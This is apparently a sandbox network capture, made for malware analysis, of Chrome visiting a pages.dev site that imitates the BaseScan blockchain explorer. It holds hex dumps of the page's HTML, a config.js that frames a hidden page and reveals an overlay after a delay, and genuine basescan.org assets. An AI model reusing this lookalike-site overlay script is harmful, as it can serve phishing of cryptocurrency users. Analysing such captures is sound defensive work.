                                                                                                                                                                                                                                              Data Ascii: top: 0; left: 0; cursor: default } .ui-state-active { border-color: #e7eaf3; background: #f8fafd; } body.dark-mode .ui-state-active { backgroun
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 78 2d 77 69 64 74 68 3a 20 34 32 30 70 78 3b 0d 0d 0a 20 20 20 20 20 20 20 20 7d 20 20 20 20 20 20 20 20 0d 0d 0a 20 20 20 20 20 20 20 20 0d 0d 0a 20 20 20 20 20 20 20 20 2e 74 6f 6f 6c 74 69 70 2d 69 6e 6e 65 72 20 7b 0d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 32 31 36 31 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0d 0a 20 20 20 20 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 74 6f 70 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 7b 0d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 20 23 31 32 31 36 31 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 3c 2f 73 74 79 6c 65
                                                                                                                                                                                                                                              Data Ascii: x-width: 420px; } .tooltip-inner { background-color: #12161c !important; } .bs-tooltip-top .arrow::before{ border-top-color: #12161c !important; } </style
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 6f 75 6e 64 65 64 20 6d 74 2d 31 20 6d 6c 2d 6e 31 20 74 65 78 74 2d 6e 6f 77 72 61 70 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 64 61 72 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 45 74 68 3a 20 24 33 2c 31 32 31 2e 32 34 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 64 61 74 61 2d 70 6c 61 63 65 6d 65 6e 74 3d 22 74 6f 70 22 20 64 61 74 61 2d 74 69 74 6c 65 3d 22 43 68 61 6e 67 65 73 20 69 6e 20 74 68 65 20 6c 61 73 74 20 32 34 20 68 6f 75 72 73 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 74 6f 6f 6c 74 69 70 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 73 75 63 63 65 73 73 22
                                                                                                                                                                                                                                              Data Ascii: ounded mt-1 ml-n1 text-nowrap"> <span class="text-dark"> Eth: $3,121.24 </span> <span data-placement="top" data-title="Changes in the last 24 hours" data-toggle="tooltip"> <span class="text-success"
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 61 6e 69 6d 61 74 69 6f 6e 2d 69 6e 3d 22 73 6c 69 64 65 49 6e 55 70 22 20 64 61 74 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6f 75 74 3d 22 66 61 64 65 4f 75 74 22 20 64 61 74 61 2d 65 76 65 6e 74 3d 22 68 6f 76 65 72 22 20 69 64 3d 22 4c 49 5f 62 6c 6f 63 6b 63 68 61 69 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 70 61 67 65 73 53 75 62 4d 65 6e 75 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 75 2d 68 65 61 64 65 72 5f 5f 6e 61 76 2d 6c 69 6e 6b 20 75 2d 68 65 61 64 65 72 5f 5f 6e 61 76 2d 6c 69 6e 6b 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 6a 61 76 61 73
                                                                                                                                                                                                                                              Data Ascii: animation-in="slideInUp" data-animation-out="fadeOut" data-event="hover" id="LI_blockchain"> <a aria-expanded="false" aria-haspopup="true" aria-labelledby="pagesSubMenu" class="nav-link u-header__nav-link u-header__nav-link-toggle" href="javas
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 22 6e 61 76 53 75 62 42 6c 6f 63 6b 73 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 75 2d 68 65 61 64 65 72 5f 5f 73 75 62 2d 6d 65 6e 75 2d 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 62 6c 6f 63 6b 73 22 20 69 64 3d 22 6e 61 76 42 6c 6f 63 6b 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 69 65 77 20 42 6c 6f 63 6b 73 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 69 64 3d 22 4c 49 5f 62 61 74 63 68 65 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 61 72 69 61 2d
                                                                                                                                                                                                                                              Data Ascii: "navSubBlocks" aria-expanded="false" aria-haspopup="true" class="nav-link u-header__sub-menu-nav-link" href="/blocks" id="navBlocks"> View Blocks </a> </li> <li id="LI_batches"> <a aria-
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 74 3d 22 66 61 64 65 4f 75 74 22 20 64 61 74 61 2d 65 76 65 6e 74 3d 22 68 6f 76 65 72 22 20 69 64 3d 22 4c 49 5f 74 6f 6b 65 6e 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 74 6f 6b 65 6e 73 53 75 62 4d 65 6e 75 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 75 2d 68 65 61 64 65 72 5f 5f 6e 61 76 2d 6c 69 6e 6b 20 75 2d 68 65 61 64 65 72 5f 5f 6e 61 76 2d 6c 69 6e 6b 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 3b 22 20 69 64 3d 22 74 6f 6b 65 6e 73 4d 65 67 61 4d 65 6e 75 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 6f
                                                                                                                                                                                                                                              Data Ascii: t="fadeOut" data-event="hover" id="LI_tokens"> <a aria-expanded="false" aria-haspopup="true" aria-labelledby="tokensSubMenu" class="nav-link u-header__nav-link u-header__nav-link-toggle" href="javascript:;" id="tokensMegaMenu"> To
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 75 2d 68 65 61 64 65 72 5f 5f 73 75 62 2d 6d 65 6e 75 2d 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 74 6f 6b 65 6e 73 2d 6e 66 74 31 31 35 35 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 52 43 31 31 35 35 20 54 6f 70 20 54 6f 6b 65 6e 73 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 69 64 3d 22 4c 49 33 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 75 2d 68 65 61 64 65 72 5f 5f 73 75 62 2d 6d 65 6e 75 2d 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 74 6f 6b 65 6e 74 78 6e 73 2d 6e 66 74 31
                                                                                                                                                                                                                                              Data Ascii: <a class="nav-link u-header__sub-menu-nav-link" href="/tokens-nft1155"> ERC1155 Top Tokens </a> </li> <li id="LI33"> <a class="nav-link u-header__sub-menu-nav-link" href="/tokentxns-nft1


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              20192.168.2.549746172.66.44.1714435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC400OUTGET /config.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC789INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 744
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              ETag: "44dd3986f147bfcb15de97b6edd1e47b"
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uj3%2BBQnfhVJc3DNZah6CMU6l19fo8Sxhg4KeYd1RgCCzso8z8nxeHueRPkX8ia9yuWqubKoL7fjgb2oyTQGU59ZoJaA0Qh0ISioPOk2j9HvWMcGy0zzuHwj8UgMfD0AkacTOvEUqjdDZWDOKEFPqleCZjo3ekWufXdrYf9LfC4DuJV8z7gwWjW%2FO1yZJiUVW3xUXhRn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2babbb5c407-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC580INData Raw: 63 6f 6e 73 74 20 77 65 62 73 69 74 65 55 72 6c 20 3d 20 22 2f 64 69 73 74 2f 77 65 62 73 69 74 65 2e 68 74 6d 6c 22 3b 0d 0a 63 6f 6e 73 74 20 6f 76 65 72 6c 61 79 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6f 76 65 72 6c 61 79 22 29 3b 0d 0a 63 6f 6e 73 74 20 6f 76 65 72 6c 61 79 42 75 74 74 6f 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6f 76 65 72 6c 61 79 42 75 74 74 6f 6e 22 29 3b 0d 0a 63 6f 6e 73 74 20 77 65 62 73 69 74 65 46 72 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 77 65 62 73 69 74 65 46 72 61 6d 65 22 29 3b 0d 0a 0d 0a 77 65 62 73 69 74 65 46 72 61 6d 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28
                                                                                                                                                                                                                                              Data Ascii: const websiteUrl = "/dist/website.html";const overlay = document.getElementById("overlay");const overlayButton = document.getElementById("overlayButton");const websiteFrame = document.getElementById("websiteFrame");websiteFrame.addEventListener(
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC164INData Raw: 65 78 27 2c 20 27 67 72 69 64 27 2c 20 65 74 63 2e 20 69 66 20 6e 65 65 64 65 64 0d 0a 7d 0d 0a 0d 0a 2f 2f 20 43 61 6c 6c 20 74 68 65 20 66 75 6e 63 74 69 6f 6e 20 61 66 74 65 72 20 61 20 63 65 72 74 61 69 6e 20 64 65 6c 61 79 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 73 68 6f 77 48 69 64 64 65 6e 44 69 76 2c 20 33 30 30 30 29 3b 20 2f 2f 20 43 68 61 6e 67 65 20 33 30 30 30 20 74 6f 20 74 68 65 20 64 65 73 69 72 65 64 20 64 65 6c 61 79 20 69 6e 20 6d 69 6c 6c 69 73 65 63 6f 6e 64 73 0d 0a
                                                                                                                                                                                                                                              Data Ascii: ex', 'grid', etc. if needed}// Call the function after a certain delaysetTimeout(showHiddenDiv, 3000); // Change 3000 to the desired delay in milliseconds


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              21192.168.2.54974735.190.80.14435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC554OUTPOST /report/v4?s=deHEn%2BV5q%2BOj8m%2FK%2Bs9P63e5aM%2BWZt7kb7%2BnUsOgU8qySCQj83V12WHgo%2FEaRv8%2BC7QaS5ObT53dnlYIFS3TxKvJc3c25tRY3WpYYjpE0c7Zgkq5Oz3lpghTVTDRMvZr4jJgw3MCYsDNTFtdUTgHzRvYEOaDfGVdAjK5KqJVuf5oviWaYkR0mQJ3oWsLyPPUzUXohvQq HTTP/1.1
                                                                                                                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Content-Length: 508
                                                                                                                                                                                                                                              Content-Type: application/reports+json
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC508OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 62 61 73 65 73 63 61 6e 2d 73 6e 61 70 73 68 6f 74 30 78 32 38 61 35 65 37 31 62 66 63 30 32 37 32 33 65 61 63 31 37 65 33 39 63 38 34 63 35 31 39 30 34 31 35 63 30 64 39 2e 70 61 67 65 73 2e 64 65 76 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e
                                                                                                                                                                                                                                              Data Ascii: [{"age":2,"body":{"elapsed_time":52,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/","sampling_fraction":1.0,"server_ip":"","status_code":0,"type":"abandon
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              date: Sat, 28 Sep 2024 01:16:00 GMT
                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              22192.168.2.549751104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC642OUTGET /assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC797INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Mon, 17 Aug 2020 07:47:00 GMT
                                                                                                                                                                                                                                              ETag: W/"072d6966a74d61:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 87381
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JVZpPZQ20cnPr2zjE53rjRbkj0o5AE3rESG0CcEfUf8mlgS74SRXNAF706NRT3Cf9VifNj%2Bnd6DqUS4wJI3L9Mh68BejvNBbDMgoBu6Ls67y5IZpF6PXSGZZlkQQmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2beae9042db-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC572INData Raw: 37 63 38 33 0d 0a 2f 2a 21 0d 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 50 72 6f 20 35 2e 31 33 2e 30 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 20 28 43 6f 6d 6d 65 72 63 69 61 6c 20 4c 69 63 65 6e 73 65 29 0d 0a 20 2a 2f 0d 0a 2e 66 61 2c 2e 66 61 62 2c 2e 66 61 64 2c 2e 66 61 6c 2c 2e 66 61 72 2c 2e 66 61 73 7b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70
                                                                                                                                                                                                                                              Data Ascii: 7c83/*! * Font Awesome Pro 5.13.0 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license (Commercial License) */.fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;disp
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 36 65 6d 7d 2e 66 61 2d 37 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 37 65 6d 7d 2e 66 61 2d 38 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 65 6d 7d 2e 66 61 2d 39 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 39 65 6d 7d 2e 66 61 2d 31 30 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 65 6d 7d 2e 66 61 2d 66 77 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 31 2e 32 35 65 6d 7d 2e 66 61 2d 75 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 2e 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 66 61 2d 75 6c 3e 6c 69 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 61 2d 6c 69 7b 6c 65 66 74 3a 2d 32 65 6d 3b 70 6f 73 69 74 69 6f 6e 3a 61 62
                                                                                                                                                                                                                                              Data Ascii: font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:ab
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 7d 2e 66 61 2d 72 6f 74 61 74 65 2d 32 37 30 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 33 29 22 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 37 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 37 30 64 65 67 29 7d 2e 66 61 2d 66 6c 69 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49
                                                                                                                                                                                                                                              Data Ascii: rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";-webkit-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal{-ms-filter:"progid:DXImageTransform.Microsoft.BasicI
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 39 22 7d 2e 66 61 2d 61 64 64 72 65 73 73 2d 63 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 62 22 7d 2e 66 61 2d 61 64 6a 75 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 32 22 7d 2e 66 61 2d 61 64 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 37 30 22 7d 2e 66 61 2d 61 64 6f 62 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 37 38 22 7d 2e 66 61 2d 61 64 76 65 72 73 61 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 36 61 22 7d 2e 66 61 2d 61 66 66 69 6c 69 61 74 65 74 68 65 6d 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 36 62 22 7d 2e 66 61 2d 61 69 72 2d 63 6f 6e 64 69 74 69 6f 6e 65 72 3a
                                                                                                                                                                                                                                              Data Ascii: re{content:"\f2b9"}.fa-address-card:before{content:"\f2bb"}.fa-adjust:before{content:"\f042"}.fa-adn:before{content:"\f170"}.fa-adobe:before{content:"\f778"}.fa-adversal:before{content:"\f36a"}.fa-affiliatetheme:before{content:"\f36b"}.fa-air-conditioner:
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 37 39 22 7d 2e 66 61 2d 61 6e 67 65 6c 6c 69 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 30 39 22 7d 2e 66 61 2d 61 6e 67 6c 65 2d 64 6f 75 62 6c 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 30 33 22 7d 2e 66 61 2d 61 6e 67 6c 65 2d 64 6f 75 62 6c 65 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 30 30 22 7d 2e 66 61 2d 61 6e 67 6c 65 2d 64 6f 75 62 6c 65 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 30 31 22 7d 2e 66 61 2d 61 6e 67 6c 65 2d 64 6f 75 62 6c 65 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 30 32 22 7d 2e 66 61 2d 61 6e 67 6c 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65
                                                                                                                                                                                                                                              Data Ascii: e{content:"\f779"}.fa-angellist:before{content:"\f209"}.fa-angle-double-down:before{content:"\f103"}.fa-angle-double-left:before{content:"\f100"}.fa-angle-double-right:before{content:"\f101"}.fa-angle-double-up:before{content:"\f102"}.fa-angle-down:before
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 61 72 72 6f 77 2d 61 6c 74 2d 73 71 75 61 72 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 35 30 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 61 6c 74 2d 73 71 75 61 72 65 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 35 31 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 61 6c 74 2d 73 71 75 61 72 65 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 35 32 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 61 6c 74 2d 73 71 75 61 72 65 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 35 33 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 61 6c 74 2d 74 6f 2d 62 6f 74 74 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 34 61 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 61 6c 74 2d 74 6f 2d
